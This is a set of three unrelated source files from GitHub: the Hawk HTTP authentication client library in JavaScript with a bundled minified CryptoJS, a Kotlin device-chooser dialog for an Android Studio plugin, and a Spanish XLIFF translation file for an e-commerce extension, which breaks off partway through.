/* HTTP Hawk Authentication Scheme Copyright (c) 2012-2014, Eran Hammer <eran@hammer.io> BSD Licensed */ // Declare namespace var hawk = { internals: {} }; hawk.client = { // Generate an Authorization header for a given request /* uri: 'http://example.com/resource?a=b' or object generated by hawk.utils.parseUri() method: HTTP verb (e.g. 'GET', 'POST') options: { // Required credentials: { id: 'dh37fgj492je', key: 'aoijedoaijsdlaksjdl', algorithm: 'sha256' // 'sha1', 'sha256' }, // Optional ext: 'application-specific', // Application specific data sent via the ext attribute timestamp: Date.now() / 1000, // A pre-calculated timestamp in seconds nonce: '2334f34f', // A pre-generated nonce localtimeOffsetMsec: 400, // Time offset to sync with server time (ignored if timestamp provided) payload: '{"some":"payload"}', // UTF-8 encoded string for body hash generation (ignored if hash provided) contentType: 'application/json', // Payload content-type (ignored if hash provided) hash: 'U4MKKSmiVxk37JCCrAVIjV=', // Pre-calculated payload hash app: '24s23423f34dx', // Oz application id dlg: '234sz34tww3sd' // Oz delegated-by application id } */ header: function (uri, method, options) { var result = { field: '', artifacts: {} }; // Validate inputs if (!uri || (typeof uri !== 'string' && typeof uri !== 'object') || !method || typeof method !== 'string' || !options || typeof options !== 'object') { result.err = 'Invalid argument type'; return result; } // Application time var timestamp = options.timestamp || hawk.utils.now(options.localtimeOffsetMsec); // Validate credentials var credentials = options.credentials; if (!credentials || !credentials.id || !credentials.key || !credentials.algorithm) { result.err = 'Invalid credentials object'; return result; } if (hawk.crypto.algorithms.indexOf(credentials.algorithm) === -1) { result.err = 'Unknown algorithm'; return result; } // Parse URI if (typeof uri === 'string') { uri = hawk.utils.parseUri(uri); } // Calculate signature var artifacts = { ts: timestamp, nonce: options.nonce || hawk.utils.randomString(6), method: method, resource: uri.resource, host: uri.host, port: uri.port, hash: options.hash, ext: options.ext, app: options.app, dlg: options.dlg }; result.artifacts = artifacts; // Calculate payload hash if (!artifacts.hash && (options.payload || options.payload === '')) { artifacts.hash = hawk.crypto.calculatePayloadHash(options.payload, credentials.algorithm, options.contentType); } var mac = hawk.crypto.calculateMac('header', credentials, artifacts); // Construct header var hasExt = artifacts.ext !== null && artifacts.ext !== undefined && artifacts.ext !== ''; // Other falsey values allowed var header = 'Hawk id="' + credentials.id + '", ts="' + artifacts.ts + '", nonce="' + artifacts.nonce + (artifacts.hash ? '", hash="' + artifacts.hash : '') + (hasExt ? '", ext="' + hawk.utils.escapeHeaderAttribute(artifacts.ext) : '') + '", mac="' + mac + '"'; if (artifacts.app) { header += ', app="' + artifacts.app + (artifacts.dlg ? '", dlg="' + artifacts.dlg : '') + '"'; } result.field = header; return result; }, // Generate a bewit value for a given URI /* uri: 'http://example.com/resource?a=b' options: { // Required credentials: { id: 'dh37fgj492je', key: 'aoijedoaijsdlaksjdl', algorithm: 'sha256' // 'sha1', 'sha256' }, ttlSec: 60 * 60, // TTL in seconds // Optional ext: 'application-specific', // Application specific data sent via the ext attribute localtimeOffsetMsec: 400 // Time offset to sync with server time }; */ bewit: function (uri, options) { // Validate inputs if (!uri || (typeof uri !== 'string') || !options || typeof options !== 'object' || !options.ttlSec) { return ''; } options.ext = (options.ext === null || options.ext === undefined ? '' : options.ext); // Zero is valid value // Application time var now = hawk.utils.now(options.localtimeOffsetMsec); // Validate credentials var credentials = options.credentials; if (!credentials || !credentials.id || !credentials.key || !credentials.algorithm) { return ''; } if (hawk.crypto.algorithms.indexOf(credentials.algorithm) === -1) { return ''; } // Parse URI uri = hawk.utils.parseUri(uri); // Calculate signature var exp = now + options.ttlSec; var mac = hawk.crypto.calculateMac('bewit', credentials, { ts: exp, nonce: '', method: 'GET', resource: uri.resource, // Maintain trailing '?' and query params host: uri.host, port: uri.port, ext: options.ext }); // Construct bewit: id\exp\mac\ext var bewit = credentials.id + '\\' + exp + '\\' + mac + '\\' + options.ext; return hawk.utils.base64urlEncode(bewit); }, // Validate server response /* request: object created via 'new XMLHttpRequest()' after response received artifacts: object received from header().artifacts options: { payload: optional payload received required: specifies if a Server-Authorization header is required. Defaults to 'false' } */ authenticate: function (request, credentials, artifacts, options) { options = options || {}; var getHeader = function (name) { return request.getResponseHeader ? request.getResponseHeader(name) : request.getHeader(name); }; var wwwAuthenticate = getHeader('www-authenticate'); if (wwwAuthenticate) { // Parse HTTP WWW-Authenticate header var wwwAttributes = hawk.utils.parseAuthorizationHeader(wwwAuthenticate, ['ts', 'tsm', 'error']); if (!wwwAttributes) { return false; } if (wwwAttributes.ts) { var tsm = hawk.crypto.calculateTsMac(wwwAttributes.ts, credentials); if (tsm !== wwwAttributes.tsm) { return false; } hawk.utils.setNtpOffset(wwwAttributes.ts - Math.floor((new Date()).getTime() / 1000)); // Keep offset at 1 second precision } } // Parse HTTP Server-Authorization header var serverAuthorization = getHeader('server-authorization'); if (!serverAuthorization && !options.required) { return true; } var attributes = hawk.utils.parseAuthorizationHeader(serverAuthorization, ['mac', 'ext', 'hash']); if (!attributes) { return false; } var modArtifacts = { ts: artifacts.ts, nonce: artifacts.nonce, method: artifacts.method, resource: artifacts.resource, host: artifacts.host, port: artifacts.port, hash: attributes.hash, ext: attributes.ext, app: artifacts.app, dlg: artifacts.dlg }; var mac = hawk.crypto.calculateMac('response', credentials, modArtifacts); if (mac !== attributes.mac) { return false; } if (!options.payload && options.payload !== '') { return true; } if (!attributes.hash) { return false; } var calculatedHash = hawk.crypto.calculatePayloadHash(options.payload, credentials.algorithm, getHeader('content-type')); return (calculatedHash === attributes.hash); }, message: function (host, port, message, options) { // Validate inputs if (!host || typeof host !== 'string' || !port || typeof port !== 'number' || message === null || message === undefined || typeof message !== 'string' || !options || typeof options !== 'object') { return null; } // Application time var timestamp = options.timestamp || hawk.utils.now(options.localtimeOffsetMsec); // Validate credentials var credentials = options.credentials; if (!credentials || !credentials.id || !credentials.key || !credentials.algorithm) { // Invalid credential object return null; } if (hawk.crypto.algorithms.indexOf(credentials.algorithm) === -1) { return null; } // Calculate signature var artifacts = { ts: timestamp, nonce: options.nonce || hawk.utils.randomString(6), host: host, port: port, hash: hawk.crypto.calculatePayloadHash(message, credentials.algorithm) }; // Construct authorization var result = { id: credentials.id, ts: artifacts.ts, nonce: artifacts.nonce, hash: artifacts.hash, mac: hawk.crypto.calculateMac('message', credentials, artifacts) }; return result; }, authenticateTimestamp: function (message, credentials, updateClock) { // updateClock defaults to true var tsm = hawk.crypto.calculateTsMac(message.ts, credentials); if (tsm !== message.tsm) { return false; } if (updateClock !== false) { hawk.utils.setNtpOffset(message.ts - Math.floor((new Date()).getTime() / 1000)); // Keep offset at 1 second precision } return true; } }; hawk.crypto = { headerVersion: '1', algorithms: ['sha1', 'sha256'], calculateMac: function (type, credentials, options) { var normalized = hawk.crypto.generateNormalizedString(type, options); var hmac = CryptoJS['Hmac' + credentials.algorithm.toUpperCase()](normalized, credentials.key); return hmac.toString(CryptoJS.enc.Base64); }, generateNormalizedString: function (type, options) { var normalized = 'hawk.' + hawk.crypto.headerVersion + '.' + type + '\n' + options.ts + '\n' + options.nonce + '\n' + (options.method || '').toUpperCase() + '\n' + (options.resource || '') + '\n' + options.host.toLowerCase() + '\n' + options.port + '\n' + (options.hash || '') + '\n'; if (options.ext) { normalized += options.ext.replace('\\', '\\\\').replace('\n', '\\n'); } normalized += '\n'; if (options.app) { normalized += options.app + '\n' + (options.dlg || '') + '\n'; } return normalized; }, calculatePayloadHash: function (payload, algorithm, contentType) { var hash = CryptoJS.algo[algorithm.toUpperCase()].create(); hash.update('hawk.' + hawk.crypto.headerVersion + '.payload\n'); hash.update(hawk.utils.parseContentType(contentType) + '\n'); hash.update(payload); hash.update('\n'); return hash.finalize().toString(CryptoJS.enc.Base64); }, calculateTsMac: function (ts, credentials) { var hash = CryptoJS['Hmac' + credentials.algorithm.toUpperCase()]('hawk.' + hawk.crypto.headerVersion + '.ts\n' + ts + '\n', credentials.key); return hash.toString(CryptoJS.enc.Base64); } }; // localStorage compatible interface hawk.internals.LocalStorage = function () { this._cache = {}; this.length = 0; this.getItem = function (key) { return this._cache.hasOwnProperty(key) ? String(this._cache[key]) : null; }; this.setItem = function (key, value) { this._cache[key] = String(value); this.length = Object.keys(this._cache).length; }; this.removeItem = function (key) { delete this._cache[key]; this.length = Object.keys(this._cache).length; }; this.clear = function () { this._cache = {}; this.length = 0; }; this.key = function (i) { return Object.keys(this._cache)[i || 0]; }; }; hawk.utils = { storage: new hawk.internals.LocalStorage(), setStorage: function (storage) { var ntpOffset = hawk.utils.storage.getItem('hawk_ntp_offset'); hawk.utils.storage = storage; if (ntpOffset) { hawk.utils.setNtpOffset(ntpOffset); } }, setNtpOffset: function (offset) { try { hawk.utils.storage.setItem('hawk_ntp_offset', offset); } catch (err) { console.error('[hawk] could not write to storage.'); console.error(err); } }, getNtpOffset: function () { var offset = hawk.utils.storage.getItem('hawk_ntp_offset'); if (!offset) { return 0; } return parseInt(offset, 10); }, now: function (localtimeOffsetMsec) { return Math.floor(((new Date()).getTime() + (localtimeOffsetMsec || 0)) / 1000) + hawk.utils.getNtpOffset(); }, escapeHeaderAttribute: function (attribute) { return attribute.replace(/\\/g, '\\\\').replace(/\"/g, '\\"'); }, parseContentType: function (header) { if (!header) { return ''; } return header.split(';')[0].replace(/^\s+|\s+$/g, '').toLowerCase(); }, parseAuthorizationHeader: function (header, keys) { if (!header) { return null; } var headerParts = header.match(/^(\w+)(?:\s+(.*))?$/); // Header: scheme[ something] if (!headerParts) { return null; } var scheme = headerParts[1]; if (scheme.toLowerCase() !== 'hawk') { return null; } var attributesString = headerParts[2]; if (!attributesString) { return null; } var attributes = {}; var verify = attributesString.replace(/(\w+)="([^"\\]*)"\s*(?:,\s*|$)/g, function ($0, $1, $2) { // Check valid attribute names if (keys.indexOf($1) === -1) { return; } // Allowed attribute value characters: !#$%&'()*+,-./:;<=>?@[]^_`{|}~ and space, a-z, A-Z, 0-9 if ($2.match(/^[ \w\!#\$%&'\(\)\*\+,\-\.\/\:;<\=>\?@\[\]\^`\{\|\}~]+$/) === null) { return; } // Check for duplicates if (attributes.hasOwnProperty($1)) { return; } attributes[$1] = $2; return ''; }); if (verify !== '') { return null; } return attributes; }, randomString: function (size) { var randomSource = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'; var len = randomSource.length; var result = []; for (var i = 0; i < size; ++i) { result[i] = randomSource[Math.floor(Math.random() * len)]; } return result.join(''); }, uriRegex: /^([^:]+)\:\/\/(?:[^@]*@)?([^\/:]+)(?:\:(\d+))?([^#]*)(?:#.*)?$/, // scheme://credentials@host:port/resource#fragment parseUri: function (input) { var parts = input.match(hawk.utils.uriRegex); if (!parts) { return { host: '', port: '', resource: '' }; } var scheme = parts[1].toLowerCase(); var uri = { host: parts[2], port: parts[3] || (scheme === 'http' ? '80' : (scheme === 'https' ? '443' : '')), resource: parts[4] }; return uri; }, base64urlEncode: function (value) { var wordArray = CryptoJS.enc.Utf8.parse(value); var encoded = CryptoJS.enc.Base64.stringify(wordArray); return encoded.replace(/\+/g, '-').replace(/\//g, '_').replace(/\=/g, ''); } }; // $lab:coverage:off$ /* eslint-disable */ // Based on: Crypto-JS v3.1.2 // Copyright (c) 2009-2013, Jeff Mott. All rights reserved. // http://code.google.com/p/crypto-js/ // http://code.google.com/p/crypto-js/wiki/License var CryptoJS = CryptoJS || function (h, r) { var k = {}, l = k.lib = {}, n = function () { }, f = l.Base = { extend: function (a) { n.prototype = this; var b = new n; a && b.mixIn(a); b.hasOwnProperty("init") || (b.init = function () { b.$super.init.apply(this, arguments) }); b.init.prototype = b; b.$super = this; return b }, create: function () { var a = this.extend(); a.init.apply(a, arguments); return a }, init: function () { }, mixIn: function (a) { for (var b in a) a.hasOwnProperty(b) && (this[b] = a[b]); a.hasOwnProperty("toString") && (this.toString = a.toString) }, clone: function () { return this.init.prototype.extend(this) } }, j = l.WordArray = f.extend({ init: function (a, b) { a = this.words = a || []; this.sigBytes = b != r ? b : 4 * a.length }, toString: function (a) { return (a || s).stringify(this) }, concat: function (a) { var b = this.words, d = a.words, c = this.sigBytes; a = a.sigBytes; this.clamp(); if (c % 4) for (var e = 0; e < a; e++) b[c + e >>> 2] |= (d[e >>> 2] >>> 24 - 8 * (e % 4) & 255) << 24 - 8 * ((c + e) % 4); else if (65535 < d.length) for (e = 0; e < a; e += 4) b[c + e >>> 2] = d[e >>> 2]; else b.push.apply(b, d); this.sigBytes += a; return this }, clamp: function () { var a = this.words, b = this.sigBytes; a[b >>> 2] &= 4294967295 << 32 - 8 * (b % 4); a.length = h.ceil(b / 4) }, clone: function () { var a = f.clone.call(this); a.words = this.words.slice(0); return a }, random: function (a) { for (var b = [], d = 0; d < a; d += 4) b.push(4294967296 * h.random() | 0); return new j.init(b, a) } }), m = k.enc = {}, s = m.Hex = { stringify: function (a) { var b = a.words; a = a.sigBytes; for (var d = [], c = 0; c < a; c++) { var e = b[c >>> 2] >>> 24 - 8 * (c % 4) & 255; d.push((e >>> 4).toString(16)); d.push((e & 15).toString(16)) } return d.join("") }, parse: function (a) { for (var b = a.length, d = [], c = 0; c < b; c += 2) d[c >>> 3] |= parseInt(a.substr(c, 2), 16) << 24 - 4 * (c % 8); return new j.init(d, b / 2) } }, p = m.Latin1 = { stringify: function (a) { var b = a.words; a = a.sigBytes; for (var d = [], c = 0; c < a; c++) d.push(String.fromCharCode(b[c >>> 2] >>> 24 - 8 * (c % 4) & 255)); return d.join("") }, parse: function (a) { for (var b = a.length, d = [], c = 0; c < b; c++) d[c >>> 2] |= (a.charCodeAt(c) & 255) << 24 - 8 * (c % 4); return new j.init(d, b) } }, t = m.Utf8 = { stringify: function (a) { try { return decodeURIComponent(escape(p.stringify(a))) } catch (b) { throw Error("Malformed UTF-8 data"); } }, parse: function (a) { return p.parse(unescape(encodeURIComponent(a))) } }, q = l.BufferedBlockAlgorithm = f.extend({ reset: function () { this._data = new j.init; this._nDataBytes = 0 }, _append: function (a) { "string" == typeof a && (a = t.parse(a)); this._data.concat(a); this._nDataBytes += a.sigBytes }, _process: function (a) { var b = this._data, d = b.words, c = b.sigBytes, e = this.blockSize, f = c / (4 * e), f = a ? h.ceil(f) : h.max((f | 0) - this._minBufferSize, 0); a = f * e; c = h.min(4 * a, c); if (a) { for (var g = 0; g < a; g += e) this._doProcessBlock(d, g); g = d.splice(0, a); b.sigBytes -= c } return new j.init(g, c) }, clone: function () { var a = f.clone.call(this); a._data = this._data.clone(); return a }, _minBufferSize: 0 }); l.Hasher = q.extend({ cfg: f.extend(), init: function (a) { this.cfg = this.cfg.extend(a); this.reset() }, reset: function () { q.reset.call(this); this._doReset() }, update: function (a) { this._append(a); this._process(); return this }, finalize: function (a) { a && this._append(a); return this._doFinalize() }, blockSize: 16, _createHelper: function (a) { return function (b, d) { return (new a.init(d)).finalize(b) } }, _createHmacHelper: function (a) { return function (b, d) { return (new u.HMAC.init(a, d)).finalize(b) } } }); var u = k.algo = {}; return k }(Math); (function () { var k = CryptoJS, b = k.lib, m = b.WordArray, l = b.Hasher, d = [], b = k.algo.SHA1 = l.extend({ _doReset: function () { this._hash = new m.init([1732584193, 4023233417, 2562383102, 271733878, 3285377520]) }, _doProcessBlock: function (n, p) { for (var a = this._hash.words, e = a[0], f = a[1], h = a[2], j = a[3], b = a[4], c = 0; 80 > c; c++) { if (16 > c) d[c] = n[p + c] | 0; else { var g = d[c - 3] ^ d[c - 8] ^ d[c - 14] ^ d[c - 16]; d[c] = g << 1 | g >>> 31 } g = (e << 5 | e >>> 27) + b + d[c]; g = 20 > c ? g + ((f & h | ~f & j) + 1518500249) : 40 > c ? g + ((f ^ h ^ j) + 1859775393) : 60 > c ? g + ((f & h | f & j | h & j) - 1894007588) : g + ((f ^ h ^ j) - 899497514); b = j; j = h; h = f << 30 | f >>> 2; f = e; e = g } a[0] = a[0] + e | 0; a[1] = a[1] + f | 0; a[2] = a[2] + h | 0; a[3] = a[3] + j | 0; a[4] = a[4] + b | 0 }, _doFinalize: function () { var b = this._data, d = b.words, a = 8 * this._nDataBytes, e = 8 * b.sigBytes; d[e >>> 5] |= 128 << 24 - e % 32; d[(e + 64 >>> 9 << 4) + 14] = Math.floor(a / 4294967296); d[(e + 64 >>> 9 << 4) + 15] = a; b.sigBytes = 4 * d.length; this._process(); return this._hash }, clone: function () { var b = l.clone.call(this); b._hash = this._hash.clone(); return b } }); k.SHA1 = l._createHelper(b); k.HmacSHA1 = l._createHmacHelper(b) })(); (function (k) { for (var g = CryptoJS, h = g.lib, v = h.WordArray, j = h.Hasher, h = g.algo, s = [], t = [], u = function (q) { return 4294967296 * (q - (q | 0)) | 0 }, l = 2, b = 0; 64 > b;) { var d; a: { d = l; for (var w = k.sqrt(d), r = 2; r <= w; r++) if (!(d % r)) { d = !1; break a } d = !0 } d && (8 > b && (s[b] = u(k.pow(l, 0.5))), t[b] = u(k.pow(l, 1 / 3)), b++); l++ } var n = [], h = h.SHA256 = j.extend({ _doReset: function () { this._hash = new v.init(s.slice(0)) }, _doProcessBlock: function (q, h) { for (var a = this._hash.words, c = a[0], d = a[1], b = a[2], k = a[3], f = a[4], g = a[5], j = a[6], l = a[7], e = 0; 64 > e; e++) { if (16 > e) n[e] = q[h + e] | 0; else { var m = n[e - 15], p = n[e - 2]; n[e] = ((m << 25 | m >>> 7) ^ (m << 14 | m >>> 18) ^ m >>> 3) + n[e - 7] + ((p << 15 | p >>> 17) ^ (p << 13 | p >>> 19) ^ p >>> 10) + n[e - 16] } m = l + ((f << 26 | f >>> 6) ^ (f << 21 | f >>> 11) ^ (f << 7 | f >>> 25)) + (f & g ^ ~f & j) + t[e] + n[e]; p = ((c << 30 | c >>> 2) ^ (c << 19 | c >>> 13) ^ (c << 10 | c >>> 22)) + (c & d ^ c & b ^ d & b); l = j; j = g; g = f; f = k + m | 0; k = b; b = d; d = c; c = m + p | 0 } a[0] = a[0] + c | 0; a[1] = a[1] + d | 0; a[2] = a[2] + b | 0; a[3] = a[3] + k | 0; a[4] = a[4] + f | 0; a[5] = a[5] + g | 0; a[6] = a[6] + j | 0; a[7] = a[7] + l | 0 }, _doFinalize: function () { var d = this._data, b = d.words, a = 8 * this._nDataBytes, c = 8 * d.sigBytes; b[c >>> 5] |= 128 << 24 - c % 32; b[(c + 64 >>> 9 << 4) + 14] = k.floor(a / 4294967296); b[(c + 64 >>> 9 << 4) + 15] = a; d.sigBytes = 4 * b.length; this._process(); return this._hash }, clone: function () { var b = j.clone.call(this); b._hash = this._hash.clone(); return b } }); g.SHA256 = j._createHelper(h); g.HmacSHA256 = j._createHmacHelper(h) })(Math); (function () { var c = CryptoJS, k = c.enc.Utf8; c.algo.HMAC = c.lib.Base.extend({ init: function (a, b) { a = this._hasher = new a.init; "string" == typeof b && (b = k.parse(b)); var c = a.blockSize, e = 4 * c; b.sigBytes > e && (b = a.finalize(b)); b.clamp(); for (var f = this._oKey = b.clone(), g = this._iKey = b.clone(), h = f.words, j = g.words, d = 0; d < c; d++) h[d] ^= 1549556828, j[d] ^= 909522486; f.sigBytes = g.sigBytes = e; this.reset() }, reset: function () { var a = this._hasher; a.reset(); a.update(this._iKey) }, update: function (a) { this._hasher.update(a); return this }, finalize: function (a) { var b = this._hasher; a = b.finalize(a); b.reset(); return b.finalize(this._oKey.clone().concat(a)) } }) })(); (function () { var h = CryptoJS, j = h.lib.WordArray; h.enc.Base64 = { stringify: function (b) { var e = b.words, f = b.sigBytes, c = this._map; b.clamp(); b = []; for (var a = 0; a < f; a += 3) for (var d = (e[a >>> 2] >>> 24 - 8 * (a % 4) & 255) << 16 | (e[a + 1 >>> 2] >>> 24 - 8 * ((a + 1) % 4) & 255) << 8 | e[a + 2 >>> 2] >>> 24 - 8 * ((a + 2) % 4) & 255, g = 0; 4 > g && a + 0.75 * g < f; g++) b.push(c.charAt(d >>> 6 * (3 - g) & 63)); if (e = c.charAt(64)) for (; b.length % 4;) b.push(e); return b.join("") }, parse: function (b) { var e = b.length, f = this._map, c = f.charAt(64); c && (c = b.indexOf(c), -1 != c && (e = c)); for (var c = [], a = 0, d = 0; d < e; d++) if (d % 4) { var g = f.indexOf(b.charAt(d - 1)) << 2 * (d % 4), h = f.indexOf(b.charAt(d)) >>> 6 - 2 * (d % 4); c[a >>> 2] |= (g | h) << 24 - 8 * (a % 4); a++ } return j.create(c, a) }, _map: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=" } })(); hawk.crypto.internals = CryptoJS; // Export if used as a module if (typeof module !== 'undefined' && module.exports) { module.exports = hawk; } /* eslint-enable */ // $lab:coverage:on$
{ "pile_set_name": "Github" }
package com.developerphil.adbidea.ui import com.android.ddmlib.IDevice import com.developerphil.adbidea.ObjectGraph import com.developerphil.adbidea.preference.ProjectPreferences import com.intellij.openapi.project.Project import com.intellij.openapi.ui.DialogWrapper import com.intellij.openapi.util.Disposer import org.jetbrains.android.facet.AndroidFacet import org.jetbrains.android.util.AndroidBundle import org.joor.Reflect import javax.swing.JCheckBox import javax.swing.JComponent import javax.swing.JPanel /** * https://android.googlesource.com/platform/tools/adt/idea/+/refs/heads/mirror-goog-studio-master-dev/android/src/com/android/tools/idea/run/DeviceChooserDialog.java */ class DeviceChooserDialog(facet: AndroidFacet) : DialogWrapper(facet.module.project, true) { lateinit var myPanel: JPanel lateinit var myDeviceChooserWrapper: JPanel lateinit var useSameDeviceSCheckBox: JCheckBox private val myProject: Project private val myDeviceChooser: MyDeviceChooser private val projectPreferences: ProjectPreferences val selectedDevices: Array<IDevice> get() = myDeviceChooser.selectedDevices init { title = AndroidBundle.message("choose.device.dialog.title") myProject = facet.module.project projectPreferences = myProject.getComponent(ObjectGraph::class.java).projectPreferences okAction.isEnabled = false myDeviceChooser = MyDeviceChooser(true, okAction, facet, null) Disposer.register(myDisposable, myDeviceChooser) myDeviceChooser.addListener(object : DeviceChooserListener { override fun selectedDevicesChanged() { updateOkButton() } }) myDeviceChooserWrapper.add(myDeviceChooser.panel) myDeviceChooser.init(projectPreferences.getSelectedDeviceSerials()) init() updateOkButton() } private fun persistSelectedSerialsToPreferences() { projectPreferences.saveSelectedDeviceSerials(myDeviceChooser.selectedDevices.map { it.serialNumber }.toList()) } private fun updateOkButton() { okAction.isEnabled = selectedDevices.isNotEmpty() } override fun getPreferredFocusedComponent(): JComponent? { return try { myDeviceChooser.preferredFocusComponent } catch (e: NoSuchMethodError) { // that means that we are probably on a preview version of android studio or in intellij 13 Reflect.on(myDeviceChooser).call("getDeviceTable").get<JComponent>() } } override fun doOKAction() { myDeviceChooser.finish() persistSelectedSerialsToPreferences() super.doOKAction() } override fun getDimensionServiceKey() = javaClass.canonicalName override fun createCenterPanel(): JComponent = myPanel fun useSameDevices() = useSameDeviceSCheckBox.isSelected }
{ "pile_set_name": "Github" }
<?xml version="1.0" ?><xliff version="1.1" xmlns="urn:oasis:names:tc:xliff:document:1.2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:oasis:names:tc:xliff:document:1.2 http://docs.oasis-open.org/xliff/v1.2/cs02/xliff-core-1.2-strict.xsd"> <file datatype="plaintext" original="system/modules/isotope/languages/en/tl_iso_attribute.xlf" source-language="en" target-language="es"> <body> <trans-unit id="tl_iso_attribute.name.0"> <source>Name</source> <target>Nombre</target> </trans-unit> <trans-unit id="tl_iso_attribute.name.1"> <source>Please enter a name for this attribute.</source> <target>Por favor, introduzca un nombre para este atributo.</target> </trans-unit> <trans-unit id="tl_iso_attribute.field_name.0"> <source>Internal name</source> <target>Nombre interno</target> </trans-unit> <trans-unit id="tl_iso_attribute.field_name.1"> <source>Internal name is the database field name and must be unique.</source> <target>El nombre interno es el nombre en la base de datos y debe ser único.</target> </trans-unit> <trans-unit id="tl_iso_attribute.type.0"> <source>Type</source> <target>Tipo</target> </trans-unit> <trans-unit id="tl_iso_attribute.type.1"> <source>Please select a type for this attribute.</source> <target>Por favor seleccione un tipo de impuesto para este atributo.</target> </trans-unit> <trans-unit id="tl_iso_attribute.legend.0"> <source>Field Group</source> <target>Grupo de campo</target> </trans-unit> <trans-unit id="tl_iso_attribute.legend.1"> <source>Select a field group that this attribute relates to (used to organize related fields into collapsible fieldset groups when editing products.</source> <target>Seleccione un grupo de campo al cual se refiere este atributo (utilizado para organizar los campos relacionados en grupos fieldset plegables al editar los productos).</target> </trans-unit> <trans-unit id="tl_iso_attribute.variant_option.0"> <source>Add to product variants wizard</source> <target>Asistente para añadir variantes del producto</target> </trans-unit> <trans-unit id="tl_iso_attribute.variant_option.1"> <source>If selected, this attribute will be added to the product variants wizard for use as a product variant option.</source> <target>Si está seleccionada, se añadirá este atributo en el asistente variantes del producto, para su uso como una opción de variante del producto.</target> </trans-unit> <trans-unit id="tl_iso_attribute.customer_defined.0"> <source>Defined by customer</source> <target>Definido por el cliente</target> </trans-unit> <trans-unit id="tl_iso_attribute.customer_defined.1"> <source>Please select if this value defined by the customer (frontend).</source> <target>Por favor, seleccione si este valor esta definido por el cliente (frontend).</target> </trans-unit> <trans-unit id="tl_iso_attribute.description.0"> <source>Description</source> <target>Descripción</target> </trans-unit> <trans-unit id="tl_iso_attribute.description.1"> <source>The description is shown as a hint to the backend user.</source> <target>La descripción se muestra como una sugerencia al usuario backend.</target> </trans-unit> <trans-unit id="tl_iso_attribute.optionsSource.0"> <source>Options source</source> </trans-unit> <trans-unit id="tl_iso_attribute.optionsSource.1"> <source>Choose where the options for this field should be loaded from.</source> </trans-unit> <trans-unit id="tl_iso_attribute.optionsSource.name"> <source>Attribute Name (Single Option)</source> </trans-unit> <trans-unit id="tl_iso_attribute.optionsSource.table"> <source>Options Manager</source> </trans-unit> <trans-unit id="tl_iso_attribute.optionsSource.product"> <source>Product</source> <target>Producto</target> </trans-unit> <trans-unit id="tl_iso_attribute.optionsSource.foreignKey"> <source>Custom database table (foreignKey)</source> </trans-unit> <trans-unit id="tl_iso_attribute.optionsSource.attribute"> <source>Options Wizard (deprecated)</source> </trans-unit> <trans-unit id="tl_iso_attribute.options.0"> <source>Options</source> <target>Opciones</target> </trans-unit> <trans-unit id="tl_iso_attribute.options.1"> <source>Please enter one or more options. Use the buttons to add, move or delete an option. If you are working without JavaScript assistance, you should save your changes before you modify the order!</source> <target>Escriba una o varias opciones. Utilice los botones para añadir, mover o eliminar una opción. Si está trabajando sin ayuda de JavaScript debe guardar sus cambios antes de modificar el orden!</target> </trans-unit> <trans-unit id="tl_iso_attribute.options.value.0"> <source>Value</source> <target>Valor</target> </trans-unit> <trans-unit id="tl_iso_attribute.options.label.0"> <source>Label</source> <target>Etiqueta</target> </trans-unit> <trans-unit id="tl_iso_attribute.options.default.0"> <source>Default</source> <target>Por defecto</target> </trans-unit> <trans-unit id="tl_iso_attribute.options.group.0"> <source>Group</source> <target>Groupo</target> </trans-unit> <trans-unit id="tl_iso_attribute.optionsTable.0"> <source>Options</source> <target>Opciones</target> </trans-unit> <trans-unit id="tl_iso_attribute.optionsTable.1"> <source>Use the options manager to add your options to the field.</source> </trans-unit> <trans-unit id="tl_iso_attribute.includeBlankOption.0"> <source>Include blank option</source> </trans-unit> <trans-unit id="tl_iso_attribute.includeBlankOption.1"> <source>Check here to include a blank option in the select menu.</source> </trans-unit> <trans-unit id="tl_iso_attribute.blankOptionLabel.0"> <source>Label for blank option</source> </trans-unit> <trans-unit id="tl_iso_attribute.blankOptionLabel.1"> <source>You can optionally enter a label for the blank option. If you do not enter anything, a dash (-) will be used.</source> </trans-unit> <trans-unit id="tl_iso_attribute.mandatory.0"> <source>Mandatory field</source> <target>Campo obligatorio</target> </trans-unit> <trans-unit id="tl_iso_attribute.mandatory.1"> <source>The field must be filled when editing a product.</source> <target>El campo debe ser rellenado durante la edición de un producto.</target> </trans-unit> <trans-unit id="tl_iso_attribute.multiple.0"> <source>Multiple selection</source> <target>Selección múltiple</target> </trans-unit> <trans-unit id="tl_iso_attribute.multiple.1"> <source>Allow visitors to select more than one option.</source> <target>Permitir a los visitantes que seleccionen más de una opción.</target> </trans-unit> <trans-unit id="tl_iso_attribute.size.0"> <source>Size/Amount</source> </trans-unit> <trans-unit id="tl_iso_attribute.size.1"> <source>Here you can set a limit, e.g. size of the select box or number of file uploads.</source> </trans-unit> <trans-unit id="tl_iso_attribute.chosen.0"> <source>Use &quot;Chosen&quot; JavaScript</source> </trans-unit> <trans-unit id="tl_iso_attribute.chosen.1"> <source>This option enables the usage of the &quot;Chosen&quot; JavaScript for the select field, which enables you to select multiple values via a search function.</source> </trans-unit> <trans-unit id="tl_iso_attribute.extensions.0"> <source>Allowed file types</source> <target>Tipos de archivo permitidos</target> </trans-unit> <trans-unit id="tl_iso_attribute.extensions.1"> <source>A comma separated list of valid file extensions.</source> <target>Una lista separada por comas de extensiones de archivo válidos.</target> </trans-unit> <trans-unit id="tl_iso_attribute.rte.0"> <source>Use HTML editor</source> <target>Utilizar el editor HTML</target> </trans-unit> <trans-unit id="tl_iso_attribute.rte.1"> <source>Select a tinyMCE configuration file to enable the rich text editor.</source> <target>Seleccione un archivo de configuración TinyMCE para habilitar el editor de texto enriquecido.</target> </trans-unit> <trans-unit id="tl_iso_attribute.multilingual.0"> <source>Multilingual</source> <target>Multilingüe</target> </trans-unit> <trans-unit id="tl_iso_attribute.multilingual.1"> <source>Check here if this field should be translated.</source> <target>Marque aquí si este campo debe ser traducido.</target> </trans-unit> <trans-unit id="tl_iso_attribute.rgxp.0"> <source>Input validation</source> <target>Validación de entrada</target> </trans-unit> <trans-unit id="tl_iso_attribute.rgxp.1"> <source>Validate the input against a regular expression.</source> <target>Validar la entrada con una expresión regular.</target> </trans-unit> <trans-unit id="tl_iso_attribute.placeholder.0"> <source>Placeholder</source> </trans-unit> <trans-unit 